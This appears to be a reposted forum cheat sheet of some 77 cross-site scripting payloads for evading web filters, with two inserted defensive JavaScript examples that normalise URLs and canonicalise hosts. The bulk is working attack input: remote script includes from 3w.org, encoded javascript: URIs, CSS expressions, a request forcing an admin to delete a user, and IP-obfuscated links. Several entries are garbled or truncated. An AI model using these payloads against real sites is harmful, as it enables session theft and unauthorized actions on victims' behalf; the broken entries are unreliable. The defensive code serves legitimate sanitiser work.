There seems to be fairly little XSS material on t00ls, so when I saw something good I copied it over; not sure whether any of you need to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (the semicolon is required)
<IMG SRC=javascript:alert("XSS")>

(6) IMG tag that corrects a defect
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (all parts must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect in China, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters in front of the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
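What vectors (3) to (19) have in common is that the browser decodes character references and discards tabs, newlines, nulls and other control characters before it decides which scheme a URL-bearing attribute has, so a filter that searches the raw attribute for the literal string javascript: sees nothing. The following is an added example by the editor, not code from the original post: it performs that same normalisation first and only then checks the scheme against an allowlist. The function names, the small entity table, the DROPPED character set and SAFE_SCHEMES are this example's own assumptions; a production sanitiser would use the full HTML5 entity table.

```javascript
// Added example (editor's own, not code from the original post): normalise a
// URL-bearing attribute value the way a browser does before the scheme is read,
// then allowlist the scheme. Function names, the entity table, DROPPED and
// SAFE_SCHEMES are this example's assumptions.

// A handful of named references; real sanitisers use the complete HTML5 table.
const NAMED_ENTITIES = new Map([
  ['amp', '&'], ['lt', '<'], ['gt', '>'], ['quot', '"'], ['apos', "'"],
  ['Tab', '\t'], ['NewLine', '\n'], ['colon', ':'], ['sol', '/'],
]);

function codePointToChar(cp) {
  // Out-of-range references become U+FFFD, as in the HTML tokenizer.
  return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
}

// Decode &#106; / &#x6A; (the trailing semicolon is optional, vectors 8-10)
// and the named references above; unknown names are left untouched.
function decodeCharRefs(value) {
  return value
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => codePointToChar(parseInt(hex, 16)))
    .replace(/&#([0-9]+);?/g, (_, dec) => codePointToChar(parseInt(dec, 10)))
    .replace(/&([A-Za-z]+);?/g, (m, name) => NAMED_ENTITIES.get(name) ?? m);
}

// Characters a URL parser drops (tab, newline, CR, leading C0 controls and
// space) plus the wider set vector 47 lists (NBSP, U+2000-U+200B, U+3000,
// U+FEFF). Dropping all of them everywhere is stricter than any browser,
// which for a reject-or-allow decision is the safe direction.
const DROPPED = /[\u0000-\u0020\u007F\u00A0\u2000-\u200B\u3000\uFEFF]/g;

function normaliseUrl(value) {
  return decodeCharRefs(value).replace(DROPPED, '').toLowerCase();
}

const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

// True only when the normalised value has no scheme at all (a relative URL)
// or an allowlisted one; javascript:, vbscript: and unknown schemes are rejected.
function isSafeUrl(value) {
  const url = normaliseUrl(value);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(url);
  if (m === null) return true;
  return SAFE_SCHEMES.has(m[1]);
}

// Constructed inputs copied from the vectors above, plus three benign values.
const SAMPLE_VECTORS = [
  "javascript:alert('XSS')",                                                 // (3)
  "JaVaScRiPt:alert('XSS')",                                                 // (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // (5)
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A",                 // (10)
  "jav\tascript:alert('XSS');",                                              // (11)
  "jav&#x09;ascript:alert('XSS');",                                          // (12)
  "jav\nascript:alert('XSS');",                                              // (13)
  "java\u0000script:alert(\"XSS\")",                                         // (17)
  " javascript:alert('XSS');",                                               // (19)
  "vbscript:msgbox(\"XSS\")",                                                // (40)
  "http://3w.org/XSS/xss.js",                                                // allowed
  "//www.google.com/",                                                       // allowed
  "images/logo.png",                                                         // allowed
];

// Returns the sample values the check rejects, i.e. the first ten above.
function rejectedSamples() {
  return SAMPLE_VECTORS.filter((v) => !isSafeUrl(v));
}
```

The important design choice is the order of operations: decode, then strip, then lowercase, then read the scheme. Checking for javascript: before decoding misses (5) and (10); checking before stripping misses (11) to (14), (17) and (19). Relative URLs are accepted because they carry no scheme to abuse; whether a scheme-relative link such as //host/ is acceptable is a separate policy decision for the attribute in question.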
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript that escapes the escaping filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket and a name starting with a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) ActionScript inside Flash can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Decimal IP
<A HREF="http://3232235521">XSS</A>

(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
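Vectors (70) to (76) are about host names rather than script: a link or redirect filter that compares raw host strings against an allowlist or blocklist cannot tell that 3232235521, 0xc0.0xa8.0x00.0x01, 0300.0250.0000.0001 and 192.168.0.1 all name the same address, or that www.google.com. is www.google.com. The following is an added example by the editor, not code from the original post: it canonicalises a host under the legacy inet_aton rules (hex, octal and decimal components, with the last component filling the remaining bytes) before comparing. The function names and the allowlist are this example's assumptions; the numeric spellings are the ones from the list above.

```javascript
// Added example (editor's own, not code from the original post): canonicalise
// a host before comparing it with an allowlist, so that the decimal, hex,
// octal and mixed IP spellings in vectors 70-73 and the trailing-dot name in
// vector 76 compare as the host they really are. Function names and the
// allowlist used in the test are this example's assumptions.

// One dotted component under the legacy inet_aton rules browsers apply:
// 0x.. is hex, a leading 0 is octal, otherwise decimal. null if not numeric.
function parseIpv4Part(part) {
  if (/^0x[0-9a-f]*$/i.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(2), 16);
  if (/^0[0-7]*$/.test(part)) return parseInt(part, 8);
  if (/^[1-9][0-9]*$/.test(part)) return parseInt(part, 10);
  return null;
}

// Dotted-quad form of a numeric host with 1 to 4 components, the last one
// filling the remaining bytes (so 0x7f.1 and 3232235521 are valid), or null
// when the host is not a numeric IPv4 address at all.
function canonicalIpv4(host) {
  const parts = host.split('.');
  if (parts.length > 4 || parts.some((p) => p === '')) return null;
  const nums = parts.map(parseIpv4Part);
  if (nums.some((n) => n === null)) return null;
  const last = nums.pop();
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  let value = last;
  nums.forEach((n, i) => { value += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((shift) => (value >>> shift) & 255).join('.');
}

// Lowercase, drop the tab/newline/CR a URL parser discards (vector 73 relies
// on them), strip one trailing dot (vector 76), then collapse numeric forms.
function canonicalHost(host) {
  let h = host.replace(/[\t\n\r]/g, '').toLowerCase();
  if (h.endsWith('.')) h = h.slice(0, -1);
  return canonicalIpv4(h) ?? h;
}

// Allowlist comparison on canonical forms; both sides are canonicalised so a
// list entry may itself be written in any spelling.
function isAllowedHost(host, allowlist) {
  const wanted = canonicalHost(host);
  return allowlist.some((entry) => canonicalHost(entry) === wanted);
}
```

Where a complete URL is available, the WHATWG URL parser (new URL(...).hostname in browsers and Node) already performs this canonicalisation, and its hostname should be the value compared; the hand-rolled version above shows what that parser does and serves code that receives bare host strings. Comparing canonical forms still does not resolve names, so a name and the address it resolves to remain different allowlist entries.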